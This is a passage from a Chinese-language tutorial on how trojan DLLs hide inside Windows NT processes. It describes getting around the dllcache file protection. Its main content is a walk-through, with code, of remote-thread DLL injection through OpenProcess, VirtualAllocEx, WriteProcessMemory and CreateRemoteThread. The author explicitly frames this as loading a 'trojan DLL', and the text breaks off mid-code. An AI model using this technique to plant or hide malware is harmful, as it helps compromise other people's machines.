木马/后门程序在WINNT中进程隐藏及查找的方法

这个是微软用来保护DLL的法宝，一旦操作系统发现被保护的DLL文件被篡改(数字签名技术)，它就会自动从dllcache中恢复这个文件。虽然说先更改dllcache目录中的备份再修改DLL文件本身可以绕过这个保护，但是可以想见的是微软在未来必将更加小心地保护重要的DLL文件，同时特洛伊DLL方法本身有着一些漏洞(例如修复安装、安装补盯检查数字签名等方法都有可能导致特洛伊DLL失效)，所以这个方法也不能算是DLL木马的最优选择。

DLL木马的最高境界是动态嵌入技术，动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说，在Windows中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的(私人领地、请勿入内)，但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存。在多种动态嵌入技术中(窗口Hook、挂接API、远程线程)，我最喜欢的是远程线程技术(其实、其实我就会这一种……)，下面就为大家介绍一下远程线程技术。

远程线程技术指的是通过在另一个运行的进程中创建远程线程的方法进入那个线程的内存地址空间。我们知道，在进程中，可以通过CreateThread函数创建线程，被创建的新线程与主线程(就是进程创建时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道，通过CreateRemoteThread也同样可以在另一个进程内创建新线程，被创建的远程线程同样可以共享远程进程(注意：是远程进程!)的地址空间，所以，实际上，我们通过创建一个远程线程，进入了远程进程的内存地址空间，也就拥有了那个远程进程相当多的权限：例如启动一个DLL木马(与进入进程内部相比，启动一个DLL木马是小意思，实际上我们可以随意篡改那个进程的数据)

闲话少说，我们来看代码：

首先，我们通过OpenProcess 来打开我们试图嵌入的进程(如果不允许打开，那么嵌入就无法进行了，这往往是由于权限不够引起的，例如你试图打开一个受系统保护的进程)

hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允许远程创建线程

PROCESS_VM_OPERATION | //允许远程VM操作

PROCESS_VM_WRITE, //允许远程VM写

FALSE, dwRemoteProcessId );

由于我们后面需要写入远程进程的内存地址空间并建立远程线程，所以需要申请足够的权限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。

然后，我们可以建立LoadLibraryW这个线程来启动我们的DLL木马，LoadLibraryW函数是在kernel32.dll中定义的，用来加载DLL文件，它只有一个参数，就是DLL文件的绝对路径名pszLibFileName，(也就是木马DLL的全路径文件名)，但是由于木马DLL是在远程进程内调用的，所以我们首先还需要将这个文件名复制到远程地址空间：(否则远程线程读不到这个参数)

//计算DLL路径名需要的内存空间

int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);

//使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区

pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,

MEM_COMMIT, PAGE_READWRITE);

//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间

iReturnCode = WriteProcessMemory(hRemoteProcess,

pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

//计算LoadLibraryW的入口地址

PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)

GetProcAddress(GetModuleHandle(TEXT(Kernel32)), LoadLibraryW);

说明一下，上面我们计算的其实是自己这个进程内LoadLibraryW的入口地址，但是因为kernel.dll模块在所有进程内的地址都是相同的(属于内核模块)，所以这个入口地址同样适用于远程进程。

OK，万事俱备，我们通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryW的入口地址)和传递的参数pszLibFileRemote(我们复制到远程进程内存空间的木马DLL的全路径文件名)在远程进程内启动我们的木马DLL：

//启动远程线程LoadLibraryW，通过远程线程调用用户的DLL文件

hRemoteThread = CreateRemoteThread(hRemoteProcess, //被嵌入的远程进程

NULL, 0,

pfnStartAddr, //LoadLibraryW的入口地址

pszLibFileRemote, //木马DLL的全路径文件名

0, NULL);

至此，远程嵌入顺利完成，为了试验我们的DLL是不是已经正常的在远程线程运行，我编写了以下的测试DLL，这个DLL什么都不做，仅仅返回所在进程的PID：

BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)

{ char * szProcessId = (char *)malloc(10*size